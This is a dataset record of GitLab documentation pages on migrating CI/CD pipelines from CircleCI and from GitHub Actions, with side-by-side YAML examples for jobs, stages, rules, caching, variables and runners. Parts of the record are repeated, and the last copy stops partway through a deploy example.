`stages` in GitLab CI/CD: ```yaml stages: - build - test - deploy job1: stage: build script: make build dependencies job2: stage: build script: make build artifacts job3: stage: test script: make test job4: stage: deploy script: make deploy environment: production ``` #### Scheduled run GitLab CI/CD has an easy to use UI to [schedule pipelines](../pipelines/schedules.md). Also, [rules](../yaml/_index.md#rules) can be used to determine if jobs should be included or excluded from a scheduled pipeline. CircleCI example of a scheduled workflow: ```yaml commit-workflow: jobs: - build scheduled-workflow: triggers: - schedule: cron: "0 1 * * *" filters: branches: only: try-schedule-workflow jobs: - build ``` Example of the same scheduled pipeline using [`rules`](../yaml/_index.md#rules) in GitLab CI/CD: ```yaml job1: script: - make build rules: - if: $CI_PIPELINE_SOURCE == "schedule" && $CI_COMMIT_REF_NAME == "try-schedule-workflow" ``` After the pipeline configuration is saved, you configure the cron schedule in the [GitLab UI](../pipelines/schedules.md#add-a-pipeline-schedule), and can enable or disable schedules in the UI as well. #### Manual run CircleCI example of a manual workflow: ```yaml release-branch-workflow: jobs: - build - testing: requires: - build - deploy: type: approval requires: - testing ``` Example of the same workflow using [`when: manual`](../jobs/job_control.md#create-a-job-that-must-be-run-manually) in GitLab CI/CD: ```yaml deploy_prod: stage: deploy script: - echo "Deploy to production server" when: manual environment: production ``` ### Filter job by branch [Rules](../yaml/_index.md#rules) are a mechanism to determine if the job runs for a specific branch. CircleCI example of a job filtered by branch: ```yaml jobs: deploy: branches: only: - main - /rc-.*/ ``` Example of the same workflow using `rules` in GitLab CI/CD: ```yaml deploy: stage: deploy script: - echo "Deploy job" rules: - if: $CI_COMMIT_BRANCH == "main" || $CI_COMMIT_BRANCH =~ /^rc-/ environment: production ``` ### Caching GitLab provides a caching mechanism to speed up build times for your jobs by reusing previously downloaded dependencies. It's important to know the different between [cache and artifacts](../caching/_index.md#how-cache-is-different-from-artifacts) to make the best use of these features. CircleCI example of a job using a cache: ```yaml jobs: job1: steps: - restore_cache: key: source-v1-< .Revision > - checkout - run: npm install - save_cache: key: source-v1-< .Revision > paths: - "node_modules" ``` Example of the same pipeline using `cache` in GitLab CI/CD: ```yaml test_async: image: node:latest cache: # Cache modules in between jobs key: $CI_COMMIT_REF_SLUG paths: - .npm/ before_script: - npm ci --cache .npm --prefer-offline script: - node ./specs/start.js ./specs/async.spec.js ``` ## Contexts and variables CircleCI provides [Contexts](https://circleci.com/docs/contexts/) to securely pass environment variables across project pipelines. In GitLab, a [Group](../../user/group/_index.md) can be created to assemble related projects together. At the group level, [CI/CD variables](../variables/_index.md#for-a-group) can be stored outside the individual projects, and securely passed into pipelines across multiple projects. ## Orbs There are two GitLab issues open addressing CircleCI Orbs and how GitLab can achieve similar functionality. - [issue #1151](https://gitlab.com/gitlab-com/Product/-/issues/1151) - [issue #195173](https://gitlab.com/gitlab-org/gitlab/-/issues/195173) ## Build environments CircleCI offers `executors` as the underlying technology to run a specific job. In GitLab, this is done by [runners](https://docs.gitlab.com/runner/). The following environments are supported: Self-managed runners: - Linux - Windows - macOS GitLab.com instance runners: - Linux - [Windows](../runners/hosted_runners/windows.md) ([beta](../../policy/development_stages_support.md#beta)). - [macOS](../runners/hosted_runners/macos.md) ([beta](../../policy/development_stages_support.md#beta)). ### Machine and specific build environments [Tags](../yaml/_index.md#tags) can be used to run jobs on different platforms, by telling GitLab which runners should run the jobs. CircleCI example of a job running on a specific environment: ```yaml jobs: ubuntuJob: machine: image: ubuntu-1604:201903-01 steps: - checkout - run: echo "Hello, $USER!" osxJob: macos: xcode: 11.3.0 steps: - checkout - run: echo "Hello, $USER!" ``` Example of the same job using `tags` in GitLab CI/CD: ```yaml windows job: stage: build tags: - windows script: - echo Hello, %USERNAME%! osx job: stage: build tags: - osx script: - echo "Hello, $USER!" ```
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Migrating from CircleCI breadcrumbs: - doc - ci - migration --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you are currently using CircleCI, you can migrate your CI/CD pipelines to [GitLab CI/CD](../_index.md), and start making use of all its powerful features. We have collected several resources that you may find useful before starting to migrate. The [Quick Start Guide](../quick_start/_index.md) is a good overview of how GitLab CI/CD works. You may also be interested in [Auto DevOps](../../topics/autodevops/_index.md) which can be used to build, test, and deploy your applications with little to no configuration needed at all. For advanced CI/CD teams, [custom project templates](../../administration/custom_project_templates.md) can enable the reuse of pipeline configurations. If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource. ## `config.yml` vs `.gitlab-ci.yml` CircleCI's `config.yml` configuration file defines scripts, jobs, and workflows (known as "stages" in GitLab). In GitLab, a similar approach is used with a `.gitlab-ci.yml` file in the root directory of your repository. ### Jobs In CircleCI, jobs are a collection of steps to perform a specific task. In GitLab, [jobs](../jobs/_index.md) are also a fundamental element in the configuration file. The `checkout` keyword is not necessary in GitLab CI/CD as the repository is automatically fetched. CircleCI example job definition: ```yaml jobs: job1: steps: - checkout - run: "execute-script-for-job1" ``` Example of the same job definition in GitLab CI/CD: ```yaml job1: script: "execute-script-for-job1" ``` ### Docker image definition CircleCI defines images at the job level, which is also supported by GitLab CI/CD. Additionally, GitLab CI/CD supports setting this globally to be used by all jobs that don't have `image` defined. CircleCI example image definition: ```yaml jobs: job1: docker: - image: ruby:2.6 ``` Example of the same image definition in GitLab CI/CD: ```yaml job1: image: ruby:2.6 ``` ### Workflows CircleCI determines the run order for jobs with `workflows`. This is also used to determine concurrent, sequential, scheduled, or manual runs. The equivalent function in GitLab CI/CD is called [stages](../yaml/_index.md#stages). Jobs on the same stage run in parallel, and only run after previous stages complete. Execution of the next stage is skipped when a job fails by default, but this can be allowed to continue even [after a failed job](../yaml/_index.md#allow_failure). See [the Pipeline Architecture Overview](../pipelines/pipeline_architectures.md) for guidance on different types of pipelines that you can use. Pipelines can be tailored to meet your needs, such as for a large complex project or a monorepo with independent defined components. #### Parallel and sequential job execution The following examples show how jobs can run in parallel, or sequentially: 1. `job1` and `job2` run in parallel (in the `build` stage for GitLab CI/CD). 1. `job3` runs only after `job1` and `job2` complete successfully (in the `test` stage). 1. `job4` runs only after `job3` completes successfully (in the `deploy` stage). CircleCI example with `workflows`: ```yaml version: 2 jobs: job1: steps: - checkout - run: make build dependencies job2: steps: - run: make build artifacts job3: steps: - run: make test job4: steps: - run: make deploy workflows: version: 2 jobs: - job1 - job2 - job3: requires: - job1 - job2 - job4: requires: - job3 ``` Example of the same workflow as `stages` in GitLab CI/CD: ```yaml stages: - build - test - deploy job1: stage: build script: make build dependencies job2: stage: build script: make build artifacts job3: stage: test script: make test job4: stage: deploy script: make deploy environment: production ``` #### Scheduled run GitLab CI/CD has an easy to use UI to [schedule pipelines](../pipelines/schedules.md). Also, [rules](../yaml/_index.md#rules) can be used to determine if jobs should be included or excluded from a scheduled pipeline. CircleCI example of a scheduled workflow: ```yaml commit-workflow: jobs: - build scheduled-workflow: triggers: - schedule: cron: "0 1 * * *" filters: branches: only: try-schedule-workflow jobs: - build ``` Example of the same scheduled pipeline using [`rules`](../yaml/_index.md#rules) in GitLab CI/CD: ```yaml job1: script: - make build rules: - if: $CI_PIPELINE_SOURCE == "schedule" && $CI_COMMIT_REF_NAME == "try-schedule-workflow" ``` After the pipeline configuration is saved, you configure the cron schedule in the [GitLab UI](../pipelines/schedules.md#add-a-pipeline-schedule), and can enable or disable schedules in the UI as well. #### Manual run CircleCI example of a manual workflow: ```yaml release-branch-workflow: jobs: - build - testing: requires: - build - deploy: type: approval requires: - testing ``` Example of the same workflow using [`when: manual`](../jobs/job_control.md#create-a-job-that-must-be-run-manually) in GitLab CI/CD: ```yaml deploy_prod: stage: deploy script: - echo "Deploy to production server" when: manual environment: production ``` ### Filter job by branch [Rules](../yaml/_index.md#rules) are a mechanism to determine if the job runs for a specific branch. CircleCI example of a job filtered by branch: ```yaml jobs: deploy: branches: only: - main - /rc-.*/ ``` Example of the same workflow using `rules` in GitLab CI/CD: ```yaml deploy: stage: deploy script: - echo "Deploy job" rules: - if: $CI_COMMIT_BRANCH == "main" || $CI_COMMIT_BRANCH =~ /^rc-/ environment: production ``` ### Caching GitLab provides a caching mechanism to speed up build times for your jobs by reusing previously downloaded dependencies. It's important to know the different between [cache and artifacts](../caching/_index.md#how-cache-is-different-from-artifacts) to make the best use of these features. CircleCI example of a job using a cache: ```yaml jobs: job1: steps: - restore_cache: key: source-v1-< .Revision > - checkout - run: npm install - save_cache: key: source-v1-< .Revision > paths: - "node_modules" ``` Example of the same pipeline using `cache` in GitLab CI/CD: ```yaml test_async: image: node:latest cache: # Cache modules in between jobs key: $CI_COMMIT_REF_SLUG paths: - .npm/ before_script: - npm ci --cache .npm --prefer-offline script: - node ./specs/start.js ./specs/async.spec.js ``` ## Contexts and variables CircleCI provides [Contexts](https://circleci.com/docs/contexts/) to securely pass environment variables across project pipelines. In GitLab, a [Group](../../user/group/_index.md) can be created to assemble related projects together. At the group level, [CI/CD variables](../variables/_index.md#for-a-group) can be stored outside the individual projects, and securely passed into pipelines across multiple projects. ## Orbs There are two GitLab issues open addressing CircleCI Orbs and how GitLab can achieve similar functionality. - [issue #1151](https://gitlab.com/gitlab-com/Product/-/issues/1151) - [issue #195173](https://gitlab.com/gitlab-org/gitlab/-/issues/195173) ## Build environments CircleCI offers `executors` as the underlying technology to run a specific job. In GitLab, this is done by [runners](https://docs.gitlab.com/runner/). The following environments are supported: Self-managed runners: - Linux - Windows - macOS GitLab.com instance runners: - Linux - [Windows](../runners/hosted_runners/windows.md) ([beta](../../policy/development_stages_support.md#beta)). - [macOS](../runners/hosted_runners/macos.md) ([beta](../../policy/development_stages_support.md#beta)). ### Machine and specific build environments [Tags](../yaml/_index.md#tags) can be used to run jobs on different platforms, by telling GitLab which runners should run the jobs. CircleCI example of a job running on a specific environment: ```yaml jobs: ubuntuJob: machine: image: ubuntu-1604:201903-01 steps: - checkout - run: echo "Hello, $USER!" osxJob: macos: xcode: 11.3.0 steps: - checkout - run: echo "Hello, $USER!" ``` Example of the same job using `tags` in GitLab CI/CD: ```yaml windows job: stage: build tags: - windows script: - echo Hello, %USERNAME%! osx job: stage: build tags: - osx script: - echo "Hello, $USER!" ```
https://docs.gitlab.com/ci/github_actions
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/github_actions.md
2025-08-13
doc/ci/migration
[ "doc", "ci", "migration" ]
github_actions.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Migrating from GitHub Actions
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you're migrating from GitHub Actions to GitLab CI/CD, you are able to create CI/CD pipelines that replicate and enhance your GitHub Action workflows. ## Key Similarities and Differences GitHub Actions and GitLab CI/CD are both used to generate pipelines to automate building, testing, and deploying your code. Both share similarities including: - CI/CD functionality has direct access to the code stored in the project repository. - Pipeline configurations written in YAML and stored in the project repository. - Pipelines are configurable and can run in different stages. - Jobs can each use a different container image. Additionally, there are some important differences between the two: - GitHub has a marketplace for downloading 3rd-party actions, which might require additional support or licenses. - GitLab Self-Managed supports both horizontal and vertical scaling, while GitHub Enterprise Server only supports vertical scaling. - GitLab maintains and supports all features in house, and some 3rd-party integrations are accessible through templates. - GitLab provides a built-in container registry. - GitLab has native Kubernetes deployment support. - GitLab provides granular security policies. ## Comparison of features and concepts Many GitHub features and concepts have equivalents in GitLab that offer the same functionality. ### Configuration file GitHub Actions can be configured with a [workflow YAML file](https://docs.github.com/en/actions/learn-github-actions/understanding-github-actions#understanding-the-workflow-file). GitLab CI/CD uses a `.gitlab-ci.yml` YAML file by default. For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: hello: runs-on: ubuntu-latest steps: - run: echo "Hello World" ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - hello hello: stage: hello script: - echo "Hello World" ``` ### GitHub Actions workflow syntax A GitHub Actions configuration is defined in a `workflow` YAML file using specific keywords. GitLab CI/CD has similar functionality, also usually configured with YAML keywords. | GitHub | GitLab | Explanation | |-----------|----------------|-------------| | `env` | `variables` | `env` defines the variables set in a workflow, job, or step. GitLab uses `variables` to define [CI/CD variables](../variables/_index.md) at the global or job level. Variables can also be added in the UI. | | `jobs` | `stages` | `jobs` groups together all the jobs that run in the workflow. GitLab uses `stages` to group jobs together. | | `on` | Not applicable | `on` defines when a workflow is triggered. GitLab is integrated tightly with Git, so SCM polling options for triggers are not needed, but can be configured per job if required. | | `run` | Not applicable | The command to execute in the job. GitLab uses a YAML array under the `script` keyword, one entry for each command to execute. | | `runs-on` | `tags` | `runs-on` defines the GitHub runner that a job must run on. GitLab uses `tags` to select a runner. | | `steps` | `script` | `steps` groups together all the steps that run in a job. GitLab uses `script` to group together all the commands run in a job. | | `uses` | `include` | `uses` defines what GitHub Action to be added to a `step`. GitLab uses `include` to add configuration from other files to a job. | ### Common configurations This section goes over commonly used CI/CD configurations, showing how they can be converted from GitHub Actions to GitLab CI/CD. [GitHub Action workflows](https://docs.github.com/en/actions/learn-github-actions/understanding-github-actions#workflows) generate automated CI/CD jobs that are triggered when certain event take place, for example pushing a new commit. A GitHub Action workflow is a YAML file defined in the `.github/workflows` directory located in the root of the repository. The GitLab equivalent is the `.gitlab-ci.yml` configuration file, which also resides in the repository's root directory. #### Jobs Jobs are a set of commands that run in a set sequence to achieve a particular result, for example building a container or deploying to production. For example, this GitHub Actions `workflow` builds a container then deploys it to production. The jobs runs sequentially, because the `deploy` job depends on the `build` job: ```yaml on: [push] jobs: build: runs-on: ubuntu-latest container: golang:alpine steps: - run: apk update - run: go build -o bin/hello - uses: actions/upload-artifact@v3 with: name: hello path: bin/hello retention-days: 7 deploy: if: contains( github.ref, 'staging') runs-on: ubuntu-latest container: golang:alpine steps: - uses: actions/download-artifact@v3 with: name: hello - run: echo "Deploying to Staging" - run: scp bin/hello remoteuser@remotehost:/remote/directory ``` This example: - Uses the `golang:alpine` container image. - Runs a job for building code. - Stores build executable as artifact. - Runs a second job to deploy to `staging`, which also: - Requires the build job to succeed before running. - Requires the commit target branch `staging`. - Uses the build executable artifact. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: golang:alpine stages: - build - deploy build-job: stage: build script: - apk update - go build -o bin/hello artifacts: paths: - bin/hello expire_in: 1 week deploy-job: stage: deploy script: - echo "Deploying to Staging" - scp bin/hello remoteuser@remotehost:/remote/directory rules: - if: $CI_COMMIT_BRANCH == 'staging' ``` ##### Parallel In both GitHub and GitLab, Jobs run in parallel by default. For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: python-version: runs-on: ubuntu-latest container: python:latest steps: - run: python --version java-version: if: contains( github.ref, 'staging') runs-on: ubuntu-latest container: openjdk:latest steps: - run: java -version ``` This example runs a Python job and a Java job in parallel, using different container images. The Java job only runs when the `staging` branch is changed. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml python-version: image: python:latest script: - python --version java-version: image: openjdk:latest rules: - if: $CI_COMMIT_BRANCH == 'staging' script: - java -version ``` In this case, no extra configuration is needed to make the jobs run in parallel. Jobs run in parallel by default, each on a different runner assuming there are enough runners for all the jobs. The Java job is set to only run when the `staging` branch is changed. ##### Matrix In both GitLab and GitHub you can use a matrix to run a job multiple times in parallel in a single pipeline, but with different variable values for each instance of the job. For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: build: runs-on: ubuntu-latest steps: - run: echo "Building $PLATFORM for $ARCH" strategy: matrix: platform: [linux, mac, windows] arch: [x64, x86] test: runs-on: ubuntu-latest steps: - run: echo "Testing $PLATFORM for $ARCH" strategy: matrix: platform: [linux, mac, windows] arch: [x64, x86] deploy: runs-on: ubuntu-latest steps: - run: echo "Deploying $PLATFORM for $ARCH" strategy: matrix: platform: [linux, mac, windows] arch: [x64, x86] ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - build - test - deploy .parallel-hidden-job: parallel: matrix: - PLATFORM: [linux, mac, windows] ARCH: [x64, x86] build-job: extends: .parallel-hidden-job stage: build script: - echo "Building $PLATFORM for $ARCH" test-job: extends: .parallel-hidden-job stage: test script: - echo "Testing $PLATFORM for $ARCH" deploy-job: extends: .parallel-hidden-job stage: deploy script: - echo "Deploying $PLATFORM for $ARCH" ``` #### Trigger GitHub Actions requires you to add a trigger for your workflow. GitLab is integrated tightly with Git, so SCM polling options for triggers are not needed, but can be configured per job if required. Sample GitHub Actions configuration: ```yaml on: push: branches: - main ``` The equivalent GitLab CI/CD configuration would be: ```yaml rules: - if: '$CI_COMMIT_BRANCH == main' ``` Pipelines can also be [scheduled by using Cron syntax](../pipelines/schedules.md). #### Container Images With GitLab you can [run your CI/CD jobs in separate, isolated Docker containers](../docker/using_docker_images.md) by using the [`image`](../yaml/_index.md#image) keyword. For example, in a GitHub Actions `workflow` file: ```yaml jobs: update: runs-on: ubuntu-latest container: alpine:latest steps: - run: apk update ``` In this example the `apk update` command runs in an `alpine:latest` container. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml update-job: image: alpine:latest script: - apk update ``` GitLab provides every project a [container registry](../../user/packages/container_registry/_index.md) for hosting container images. Container images can be built and stored directly from GitLab CI/CD pipelines. For example: ```yaml stages: - build build-image: stage: build variables: IMAGE: $CI_REGISTRY_IMAGE/$CI_COMMIT_REF_SLUG:$CI_COMMIT_SHA before_script: - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY script: - docker build -t $IMAGE . - docker push $IMAGE ``` #### Variables In GitLab, we use the `variables` keyword to define different [CI/CD variables](../variables/_index.md) at runtime. Use variables when you need to reuse configuration data in a pipeline. You can define variables globally or per job. For example, in a GitHub Actions `workflow` file: ```yaml env: NAME: "fern" jobs: english: runs-on: ubuntu-latest env: Greeting: "hello" steps: - run: echo "$GREETING $NAME" spanish: runs-on: ubuntu-latest env: Greeting: "hola" steps: - run: echo "$GREETING $NAME" ``` In this example, variables provide different outputs for the jobs. The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml default: image: ubuntu-latest variables: NAME: "fern" english: variables: GREETING: "hello" script: - echo "$GREETING $NAME" spanish: variables: GREETING: "hola" script: - echo "$GREETING $NAME" ``` Variables can also be set up through the GitLab UI, under CI/CD settings, where you can [protect](../variables/_index.md#protect-a-cicd-variable) or [mask](../variables/_index.md#mask-a-cicd-variable) the variables. Masked variables are hidden in job logs, while protected variables can only be accessed in pipelines for protected branches or tags. For example, in a GitHub Actions `workflow` file: ```yaml jobs: login: runs-on: ubuntu-latest env: AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }} steps: - run: my-login-script.sh "$AWS_ACCESS_KEY" ``` If the `AWS_ACCESS_KEY` variable is defined in the GitLab project settings, the equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml login: script: - my-login-script.sh $AWS_ACCESS_KEY ``` Additionally, [GitHub Actions](https://docs.github.com/en/actions/learn-github-actions/contexts) and [GitLab CI/CD](../variables/predefined_variables.md) provide built-in variables which contain data relevant to the pipeline and repository. #### Conditionals When a new pipeline starts, GitLab checks the pipeline configuration to determine which jobs should run in that pipeline. You can use the [`rules` keyword](../yaml/_index.md#rules) to configure jobs to run depending on conditions like the status of variables, or the pipeline type. For example, in a GitHub Actions `workflow` file: ```yaml jobs: deploy_staging: if: contains( github.ref, 'staging') runs-on: ubuntu-latest steps: - run: echo "Deploy to staging server" ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml deploy_staging: stage: deploy script: - echo "Deploy to staging server" rules: - if: '$CI_COMMIT_BRANCH == staging' ``` #### Runners Runners are the services that execute jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own self-managed runners. Some key details about runners: - Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project. - You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware. - GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/configuration/autoscale.html). Use autoscaling to provision runners only when needed and scale down when not needed. For example, in a GitHub Actions `workflow` file: ```yaml linux_job: runs-on: ubuntu-latest steps: - run: echo "Hello, $USER" windows_job: runs-on: windows-latest steps: - run: echo "Hello, %USERNAME%" ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml linux_job: stage: build tags: - linux-runners script: - echo "Hello, $USER" windows_job: stage: build tags: - windows-runners script: - echo "Hello, %USERNAME%" ``` #### Artifacts In GitLab, any job can use the [artifacts](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs. For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: generate_cat: steps: - run: touch cat.txt - run: echo "meow" > cat.txt - uses: actions/upload-artifact@v3 with: name: cat path: cat.txt retention-days: 7 use_cat: needs: [generate_cat] steps: - uses: actions/download-artifact@v3 with: name: cat - run: cat cat.txt ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stage: - generate - use generate_cat: stage: generate script: - touch cat.txt - echo "meow" > cat.txt artifacts: paths: - cat.txt expire_in: 1 week use_cat: stage: use script: - cat cat.txt ``` #### Caching A [cache](../caching/_index.md) is created when a job downloads one or more files and saves them for faster access in the future. Subsequent jobs that use the same cache don't have to download the files again, so they execute more quickly. The cache is stored on the runner and uploaded to S3 if [distributed cache is enabled](https://docs.gitlab.com/runner/configuration/autoscale.html#distributed-runners-caching). For example, in a GitHub Actions `workflow` file: ```yaml jobs: build: runs-on: ubuntu-latest steps: - run: echo "This job uses a cache." - uses: actions/cache@v3 with: path: binaries/ key: binaries-cache-$CI_COMMIT_REF_SLUG ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml cache-job: script: - echo "This job uses a cache." cache: key: binaries-cache-$CI_COMMIT_REF_SLUG paths: - binaries/ ``` #### Templates In GitHub an Action is a set of complex tasks that need to be frequently repeated and is saved to enable reuse without redefining a CI/CD pipeline. In GitLab the equivalent to an action would be a the [`include` keyword](../yaml/includes.md), which allows you to [add CI/CD pipelines from other files](../yaml/includes.md), including template files built into GitLab. Sample GitHub Actions configuration: ```yaml - uses: hashicorp/setup-terraform@v2.0.3 ``` The equivalent GitLab CI/CD configuration would be: ```yaml include: - template: Terraform.gitlab-ci.yml ``` In these examples, the `setup-terraform` GitHub action and the `Terraform.gitlab-ci.yml` GitLab template are not exact matches. These two examples are just to show how complex configuration can be reused. ### Security Scanning features GitLab provides a variety of [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SLDC. You can add these features to your GitLab CI/CD pipeline by using templates. for example to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`: ```yaml include: - template: Jobs/SAST.gitlab-ci.yml ``` You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables). ### Secrets Management Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow. You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments. For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service: - [HashiCorp Vault](../secrets/hashicorp_vault.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md) GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third party services that support OIDC. Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure. You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk. Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is public to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables. ## Planning and Performing a Migration The following list of recommended steps was created after observing organizations that were able to quickly complete this migration. ### Create a Migration Plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploys a static site. - Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. ### Migration Steps 1. Migrate Projects from GitHub to GitLab: - (Recommended) You can use the [GitHub Importer](../../user/project/import/github.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` in each project. 1. Migrate GitHub Actions jobs to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share [CI/CD templates](../examples/_index.md#adding-templates-to-your-gitlab-installation). 1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. ### Additional Resources - [Video: How to migrate from GitHub to GitLab including Actions](https://youtu.be/0Id5oMl1Kqs?feature=shared) - [Blog: GitHub to GitLab migration the easy way](https://about.gitlab.com/blog/2023/07/11/github-to-gitlab-migration-made-easy/) If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Migrating from GitHub Actions breadcrumbs: - doc - ci - migration --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you're migrating from GitHub Actions to GitLab CI/CD, you are able to create CI/CD pipelines that replicate and enhance your GitHub Action workflows. ## Key Similarities and Differences GitHub Actions and GitLab CI/CD are both used to generate pipelines to automate building, testing, and deploying your code. Both share similarities including: - CI/CD functionality has direct access to the code stored in the project repository. - Pipeline configurations written in YAML and stored in the project repository. - Pipelines are configurable and can run in different stages. - Jobs can each use a different container image. Additionally, there are some important differences between the two: - GitHub has a marketplace for downloading 3rd-party actions, which might require additional support or licenses. - GitLab Self-Managed supports both horizontal and vertical scaling, while GitHub Enterprise Server only supports vertical scaling. - GitLab maintains and supports all features in house, and some 3rd-party integrations are accessible through templates. - GitLab provides a built-in container registry. - GitLab has native Kubernetes deployment support. - GitLab provides granular security policies. ## Comparison of features and concepts Many GitHub features and concepts have equivalents in GitLab that offer the same functionality. ### Configuration file GitHub Actions can be configured with a [workflow YAML file](https://docs.github.com/en/actions/learn-github-actions/understanding-github-actions#understanding-the-workflow-file). GitLab CI/CD uses a `.gitlab-ci.yml` YAML file by default. For example, in a GitHub Actions `workflow` file: ```yaml on: [push] jobs: hello: runs-on: ubuntu-latest steps: - run: echo "Hello World" ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml stages: - hello hello: stage: hello script: - echo "Hello World" ``` ### GitHub Actions workflow syntax A GitHub Actions configuration is defined in a `workflow` YAML file using specific keywords. GitLab CI/CD has similar functionality, also usually configured with YAML keywords. | GitHub | GitLab | Explanation | |-----------|----------------|-------------| | `env` | `variables` | `env` defines the variables set in a workflow, job, or step. GitLab uses `variables` to define [CI/CD variables](../variables/_index.md) at the global or job level. Variables can also be added in the UI. | | `jobs` | `stages` | `jobs` groups together all the jobs that run in the workflow. GitLab uses `stages` to group jobs together. | | `on` | Not applicable | `on` defines when a workflow is triggered. GitLab is integrated tightly with Git, so SCM polling options for triggers are not needed, but can be configured per job if required. | | `run` | Not applicable | The command to execute in the job. GitLab uses a YAML array under the `script` keyword, one entry for each command to execute. | | `runs-on` | `tags` | `runs-on` defines the GitHub runner that a job must run on. GitLab uses `tags` to select a runner. | | `steps` | `script` | `steps` groups together all the steps that run in a job. GitLab uses `script` to group together all the commands run in a job. | | `uses` | `include` | `uses` defines what GitHub Action to be added to a `step`. GitLab uses `include` to add configuration from other files to a job. | ### Common configurations This section goes over commonly used CI/CD configurations, showing how they can be converted from GitHub Actions to GitLab CI/CD. [GitHub Action workflows](https://docs.github.com/en/actions/learn-github-actions/understanding-github-actions#workflows) generate automated CI/CD jobs that are triggered when certain event take place, for example pushing a new commit. A GitHub Action workflow is a YAML file defined in the `.github/workflows` directory located in the root of the repository. The GitLab equivalent is the `.gitlab-ci.yml` configuration file, which also resides in the repository's root directory. #### Jobs Jobs are a set of commands that run in a set sequence to achieve a particular result, for example building a container or deploying to production. For example, this GitHub Actions `workflow` builds a container then deploys it to production. The jobs runs sequentially, because the `deploy` job depends on the `build` job: ```yaml on: [push] jobs: build: runs-on: ubuntu-latest container: golang:alpine steps: - run: apk update - run: go build -o bin/hello - uses: actions/upload-artifact@v3 with: name: hello path: bin/hello retention-days: 7 deploy: if: contains( github.ref, 'staging') runs-on: ubuntu-latest container: golang:alpine steps: - uses: actions/download-artifact@v3 with: name: hello - run: echo "Deploying to Staging" - run: scp bin/hello 